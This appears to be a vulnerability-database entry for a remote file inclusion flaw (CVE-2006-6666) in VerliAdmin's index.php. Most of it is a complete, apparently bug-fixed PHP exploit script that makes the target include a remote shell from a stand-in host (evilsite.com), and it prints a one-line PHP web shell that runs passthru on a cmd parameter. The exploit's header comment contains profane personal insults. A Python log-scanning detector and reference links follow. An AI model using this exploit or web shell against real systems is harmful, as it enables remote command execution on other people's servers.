VerliAdmin 'index.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1111792    Type: input validation
Published: 2006-12-18    Updated: 2006-12-21
CVE: CVE-2006-6666    CNNVD ID: CNNVD-200612-461
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/2944
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-461
|Details
PHP remote file inclusion vulnerability in the index.php script of VerliAdmin 0.3 and earlier allows remote authenticated users to execute arbitrary PHP code via a URL in the q parameter.
|Exploit
<?php

/*
P.S.
I wanted to send my sincere non-greetings to all the bastards like Ne0 and his whores!!
I don't give a damn about you, and you, Ne0, you pimply fuck, accept your defeat, because I will always be better than you!
I also don't greet all the lice hiding on their ridiculous DC hubs, you are simply ridiculous...
To this whole ZOO, greetings with my middle finger
H.W.D.Cale Direct Connect PL
by Kacper & DEVIL TEAM
*/

//Kacper Settings 
$exploit_name = "VerliAdmin <= 0.3 File Include Exploit";
$script_name = "VerliAdmin 0.3";
$script_site = "http://bohyn.czechweb.cz/";
$dork = 'allinurl:"verliadmin"';
//**************************************************************


print '
:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
 

[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'

Find by: Kacper (a.k.a Rahim)


========>  DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam  <========
========>         http://www.rahim.webd.pl/            <========

Contact: kacper1964@yahoo.pl

(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)

Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0de, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen

 and
 
Dr Max Virus
TamTurk,
hackersecurity.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                Greetings for 4ll Fusi0n Group members ;-)
                and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';

if ($argc<6) {
print ('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host shell nick pass cmd OPTIONS
host:      script server (ip/hostname)
shell:     path to shell
nick:      You username in hub
pass:      You username password
cmd:       a shell command (ls -la)
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.evilsite.com/shell.txt Hauru zamek ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"Hacker_Kacper_Made_in_Poland!!..Hauru..^_^..the..best..polish..team..Greetz";ini_set("max_execution_time",0);echo "hauru";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpackets($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    // eregi() was removed in PHP 7; a plain substring test for the CRLF CRLF header terminator is equivalent.
    while ((!feof($ock)) or (strpos($html, "\r\n\r\n") === false)) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$shell=$argv[2];
$nick=$argv[3];
$password=$argv[4];
$cmd="";

$port=80;
$proxy="";
for ($i=5; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

// Without a proxy the request-target is the path alone; through a proxy it must be the
// absolute URL. (The original built "http://host:port" only in the no-proxy branch and
// concatenated it with "index.php" without a separating slash.)
if ($proxy=='') {$p='';} else {$p='http://'.$host.':'.$port;}

$num1 = rand(97, 122);
$num2 = rand(65, 90);
$pass = crypt($password, chr($num1).chr($num2));   // two random letters as the crypt() salt

// The original appended the Cookie lines to $pakiet (a typo for $packet), so they were never sent.
$packet ="GET ".$p."/index.php?q=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
$packet.="Cookie: brwsr_tp=Opera;\r\n";
$packet.="Cookie: lang=pl;\r\n";
$packet.="Cookie: login=1;\r\n";
$packet.="Cookie: nick=".$nick.";\r\n";
$packet.="Cookie: password=".$pass.";\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpackets($packet);
if (strstr($html,"hauru"))
{
$temp=explode("hauru",$html);
die($temp[1]);
}
echo "Exploit err0r :(\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\n";
?>

# milw0rm.com [2006-12-18]
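As an added detection example (not part of the advisory or of the milw0rm PoC above), the following Python script scans constructed access-log lines for the request shape the PoC sends to index.php: a q= value that carries a URL, a %00 null byte, or a path traversal. The allow-list of page names and the log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the page): two benign requests for
# allow-listed pages, plus two requests shaped like the q= include attack.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Dec/2006:10:01:02 +0000] "GET /index.php?q=home HTTP/1.0" 200 512
203.0.113.9 - - [18/Dec/2006:10:02:14 +0000] "GET /index.php?q=http://203.0.113.7/shell.txt?cmd=ls%20-la%00 HTTP/1.0" 200 2048
203.0.113.9 - - [18/Dec/2006:10:02:30 +0000] "GET /index.php?q=../../../../etc/passwd%00 HTTP/1.0" 200 1400
10.0.0.5 - - [18/Dec/2006:10:03:00 +0000] "GET /index.php?q=users HTTP/1.0" 200 700
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Assumed allow-list of page names that index.php may legitimately include.
ALLOWED_PAGES = {"home", "users", "hubs"}

def classify_q(value):
    """Return the reasons an already URL-decoded q= value looks like an include attack.
    An empty list means the value is an allow-listed page name."""
    reasons = []
    if re.match(r"[a-z][a-z0-9+.\-]*://", value, re.IGNORECASE):
        reasons.append("remote-include")   # q carries a URL scheme (remote include via allow_url_fopen)
    if "\x00" in value:
        reasons.append("null-byte")        # %00 truncates any suffix the script appends to q
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("traversal")        # q walks out of the include directory
    if not reasons and value not in ALLOWED_PAGES:
        reasons.append("unknown-page")     # fails the allow-list a fixed index.php would enforce
    return reasons

def scan_log(text):
    """Return (client_ip, q_value, reasons) for every index.php request whose q= is suspicious."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/index.php"):
            continue
        # parse_qs splits each pair on the first '=' only, so a nested '?cmd=' stays inside
        # q's value, and it percent-decodes, so %00 becomes a real NUL byte.
        for q in parse_qs(parts.query, keep_blank_values=True).get("q", []):
            reasons = classify_q(q)
            if reasons:
                hits.append((m.group("ip"), q, reasons))
    return hits

if __name__ == "__main__":
    for ip, q, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip}: q={q!r} -> {', '.join(reasons)}")
```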
|References

Source: BID
Name: 21640
Link: http://www.securityfocus.com/bid/21640
Source: MILW0RM
Name: 2944
Link: http://www.milw0rm.com/exploits/2944
Source: VUPEN
Name: ADV-2006-5059
Link: http://www.frsirt.com/english/advisories/2006/5059
Source: SECUNIA
Name: 23418
Link: http://secunia.com/advisories/23418